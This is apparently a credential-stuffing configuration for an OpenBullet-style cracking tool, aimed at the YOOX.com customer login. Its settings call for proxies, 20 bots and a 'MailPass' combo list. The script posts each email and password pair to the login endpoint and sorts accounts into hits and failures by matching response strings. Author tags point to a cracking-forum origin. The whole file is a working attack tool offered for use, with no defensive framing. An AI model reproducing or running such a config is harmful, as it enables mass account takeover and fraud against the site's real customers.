[SETTINGS]
{
  "Name": "YOOX.com FLO#7780",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2019-05-31T12:20:14.2869843-07:00",
  "AdditionalInfo": "Any Bots Depends On Your Shitty Laptop",
  "Author": "FLO#7780",
  "Version": "1.1.2",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#FLO7780 REQUEST GET "https://www.yoox.com/us/myoox/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#LIKE_&_REP REQUEST POST "https://www.yoox.com/us/myoox/login" 
  CONTENT "ReturnUrl=&LoginPageType=Myoox&Email=<USER>&Password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.yoox.com" 
  HEADER "referer: https://www.yoox.com/us/myoox/login" 

#Nulled/GlobalTech KEYCHECK 
  KEYCHAIN Success OR 
    KEY "HELLO" 
  KEYCHAIN Failure OR 
    KEY "INCORRECT E-MAIL OR PASSWORD" 

